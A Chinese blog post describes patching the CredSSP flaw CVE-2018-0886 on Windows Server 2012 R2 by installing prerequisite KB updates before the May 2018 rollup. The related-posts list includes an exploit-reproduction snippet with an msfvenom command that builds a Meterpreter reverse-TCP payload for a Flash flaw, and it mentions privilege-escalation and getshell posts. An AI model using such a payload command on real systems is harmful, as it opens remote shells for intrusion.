cve-2018-0886在windows2012r2上的修复

最新推荐文章于 2023-11-16 15:53:13 发布
最新推荐文章于 2023-11-16 15:53:13 发布
阅读量1.1w 收藏 9
点赞数 1
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/luuuone/article/details/108536194
版权

通过漏洞扫描对部署的虚机windows2012r2进行系统扫描,发现存在cve-2018-0886漏洞
漏洞级别为高。
此漏洞的描述如下:
凭据安全支持提供程序协议 (CredSSP) 是处理其他应用程序的身份验证请求的身份验证提供程序。

CredSSP 的未修补版本中存在远程代码执行漏洞。 成功利用此漏洞的攻击者可以在目标系统上中继用户凭据以执行代码。 任何依赖 CredSSP 进行身份验证的应用程序都可能容易受到此类攻击。

此安全更新通过更正 CredSSP 在身份验证过程中验证请求的方式来修复此漏洞。

<*来源:Microsoft 链接:https://portal.msrc.microsoft.com/zh-CN/security-guidance/advisory/CVE-2018-0886 *>
解决办法 厂商补丁:
Microsoft

Microsoft 已经为此发布了一个安全公告(CVE-2018-0886)以及相应补丁:
CVE-2018-0886: Microsoft Windows CredSSP 远程执行代码漏洞.
链接: https://portal.msrc.microsoft.com/zh-CN/security-guidance/advisory/CVE-2018-0886

下载2018-05对应的整体安装包
windows8.1-kb4103725-x64_cdf9b5a3be2fd4fc69bc23a617402e69004737d9.msu补丁,大约330m
下载安装提示补丁不适用
再次下载2018-05对应的独立安全安装包
windows8.1-kb4103715-x64_43bebfcb5be43876fb6a13a4eb840174ecb1790c.msu补丁,大约26m
再次提示不适用
按照网上找到答案
https://zhidao.baidu.com/question/1372732175446722819.html
分别找到2012适用的
kb2919355、2932046、2934018、2937592、2938439、2959977六个安装包,逐个安装后,再次安装整体安装包kb4103725,安装成功
再次扫描后,未提示cve-2018-0886漏洞。

luuuone
关注
  • 1
    点赞
  • 9
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
windows server 2012 R2 修复CVE-2018-0886漏洞方法
Hu_wen的专栏
09-28 2794
部分补丁安装完成后会提示重启计算机,中间过程中无需重启,全部安装完成后再重启即可。下载完成后按以上的顺序安装,否则安装时会提示“此更新不适用于你的计算机”
远程执行代码漏洞(CVE-2018-0886)漏洞修复
08-21
CVE-2018-0886 CVE-2018-0886 Microsoft Windows CredSSP 远程执行代码漏洞(CVE-2018-0886) windows安全漏洞修复,亲测有效
Windows Server 2012 R2修复CredSSP 远程执行代码漏洞(CVE-2018-0886)
最新发布
Linux I Tell U
11-16 4121
是一个Microsoft Windows CredSSP(Credentials Security protocol)的远程执行代码漏洞。CredSSP是一种用于远程认证的安全协议,它允许远程用户通过安全通道访问本地资源。这个漏洞的起因是CredSSP在处理某些类型的网络请求时存在一个错误,这使得攻击者能够在受害者的计算机上执行任意代码。攻击者可以通过构造一个恶意的网络请求,利用这个漏洞来获取受害者的系统权限,并进行任意操作。
CVE-2018-0886
龙卷风摧毁停车场
03-15 1万+
Windows Remote Desktop Protocol (RDP) 中存在的漏洞,也称为 CredSSP 漏洞。该漏洞允许在目标系统上执行任意代码,不需要身份验证。在 RDP 连接过程中,Windows 使用 “CredSSP”(Credential Security Support Provider)安全协议验证用户身份。该协议使用加密算法保护凭证传输过程,通过双方协商的方式选择使用哪种加密算法。
windows10家庭版CVE-2018-0886的CredSSP 更新导致远程桌面失效的修复方法
在路上的左一
07-19 4213
摘自微软官方Microsoft 支持 近期系统更新后发现原本好用的远程桌面无法正常使用了 操作系统: x64 windows10家庭中文版 别问为什么用这个版本,买本自带的不想换。这个版本的系统按照微软官方给出的建议无法打开组策略。当然,我找到方法打开组策略了也没看到相关配置,当然,可以直接在组策略里增加相关配置,但是我最终决定直接去修改注册表,觉的这样更直接。 警告 如果使...
Microsoft Windows CredSSP 远程执行代码漏洞CVE-2018-0886
热门推荐
看着博客敲代码
04-16 3万+
Microsoft Windows CredSSP 远程执行代码漏洞 Microsoft Windows Server 2008 SP2和R2 SP1,Windows 7 SP1,Windows 8.1和RT 8.1,Windows Server 2012和R2,Windows 10 Gold,1511,1687,1703和1709中的凭证安全支持提供程序协议(CredSSP)Windows Server 2016由于CredSSP在身份验证过程中验证请求的方式(即“CredSSP远程执行代码漏洞”),17
CVE-2018-8120--提权工具
08-28
**CVE-2018-8120详解:Windows Local Privilege Escalation漏洞** CVE-2018-8120是Microsoft Windows操作系统中的一个严重安全漏洞,它允许攻击者通过本地权限提升(Local Privilege Escalation, LPE)来获取更高的...
Windows Server CVE-2016-2183 SSL/TLS协议信息泄露漏洞修复脚本
06-09
Windows Server 合规漏洞修复修复Windows Server CVE-2016-2183 SSL/TLS协议信息泄露漏洞修复脚本,基于Windows PowerShell, 兼容Windows Server 2016/2019,防止Sweet32 生日攻击
方程式工具-永恒之蓝 Windows 2008 r2 安装补丁
04-12
【1】Microsoft Windows SMB 输入验证漏洞(CVE-2017-0143)(方程式工具-永恒之蓝)[原理扫描] 【2】Microsoft Windows SMB 输入验证漏洞(CVE-2017-0144)(方程式工具-永恒之蓝)[原理扫描] 【3】Microsoft Windows SMB...
修复Windows远程桌面连接 加密 oracle 修正CredSSP身份错误
01-04
因为经常使用不同的windows操作系统远程桌面访问其他系统直接通过注册表编辑器修改注册表值有时会修复不成功,有些系统组策略中没有加密 oracle 修正选项,用此注册表脚本可很好解决此问题。 Windows远程桌面连接 出现身份错误 要求的函数不受支持 原因 CVE-2018-0886 的 CredSSP 更新 将默认设置从“易受攻击”更改为“缓解”的更新。 注册表路径 HKLM\Software\Microsoft\Windows\CurrentVersion\Policies\System\CredSSP\Parameters 值AllowEncryptionOracle 数据类型DWORD 不需要重启,执行后立即生效,在win8,win10,winServer下测试都可成功。
关于CVE-2018-0886 | CredSSP 远程执行代码漏洞
alxuq04404的专栏
05-14 7497
5月10日远程连接一台window server 2008 R2的服务器,出现身份验证错误,要求的函数不受支持。远程计算机这可能是由于CredSSP加密Oracle修正。 如下图: 相关资料如下: https://support.microsoft.com/zh-cn/help/4093492/credssp-updates-for-cve-2018-088...
Windows Server 2008 R2 Microsoft Windows CredSSP 远程执行代码漏洞(CVE-2018-0886)
友人A的博客
06-15 5158
一、漏洞信息 1、 二、整改记录
windows Server 2012 R2扫描漏洞处理(CVE-2018-0886CVE-2016-2183,CVE-2013-2566,CVE-2015-2808)
weixin_39945506的博客
08-23 1万+
介绍 公司项目安全性检查,发现windows server 2012R2服务器上有图中四个高风险和中风险漏铜需要处理。 CVE-2018-0886 1、其中已经指出了解决办法,访问网址:https://portal.msrc.microsoft.com/zh-CN/security-guidance/advisory/CVE-2018-0886,网址有可能会无法打开,需要在器官网上注册账户。 2、网址打开后,按照下图找到对应系统的补丁包 之后将下载的文件在服务器上双击执行就完成。 如果出现其他问题,可
CVE-2018-4878的复现
大方子
10-07 4318
前言: CVE-2018-4878利用flash的漏洞来进行攻击,如果受害者的flash版本在28.0.0.137及其之前,那么攻击者可以通过诱使受害者点击链接访问特定网页来控制受害者的电脑。 1 漏洞影响范围 Flash Player28.0.0.137及以前的所有版本 2 漏洞复现 2.1 测试环境 攻击机:kali2017 靶机:win7_x64+IE8+FLASH_playe...
CVE-2018-8961复现
^_^
02-05 3614
libming的UAF漏洞复现
帝国Cms7.5后台getshell | (CVE-2018-18086)漏洞复现
一醉一休的博客
09-13 3216
EmpireCMS(帝国网站管理系统)是一套内容管理系统(`CMS`),EmpireCMS 7.5版本及之前版本在后台备份数据库时,未对数据库表名做验证,通过修改数据库表名可以`实现任意代码执行`,EmpireCMS7.5版本中的/e/class/moddofun.php文件的`LoadInMod函数`存在安全漏洞,攻击者可利用该漏洞上传任意文件,该漏洞编号为`CVE-2018-18086`
CVE-2018-4878 漏洞复现
qq_42039946的博客
05-14 1074
1.生成shellcode msfvenom -p windows/meterpreter/reverse_tcp lhost=192.168.8.130 lport=8888 -f python>shellcode.txt lhost的修改为自己kali平台的IP,端口号也可以自行修改 2.查看shellcode root@kali:~# cat shellcode.txt 3.编辑CVE-2018-4878-master.py文件 3.1 替换shellcode 3.2修改swf..
CVE20190708复现
qq_45284666的博客
11-03 5046
一、实验环境 基于虚拟机运行: (1)靶机(ip:192.168.8.***): (2)测试机(192.168.8.***): (3)将两个虚拟机设置于同一个网段中
CVE-2018-8034
07-28
CVE-2018-8034是一个与Apache Tomcat相关的漏洞。根据提供的引用内容,我无法找到与CVE-2018-8034直接相关的信息。请提供更多关于CVE-2018-8034的信息,以便我能够为您提供准确的答案。 #### 引用[.reference_title] - *1* [windows Server 2012 R2扫描漏洞处理(CVE-2018-0886CVE-2016-2183,CVE-2013-2566,CVE-2015-2808)](https://blog.csdn.net/weixin_39945506/article/details/119863457)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v91^control_2,239^v3^insert_chatgpt"}} ] [.reference_item] - *2* *3* [常见主机漏洞](https://blog.csdn.net/weixin_45849370/article/details/102956932)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v91^control_2,239^v3^insert_chatgpt"}} ] [.reference_item] [ .reference_list ]
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值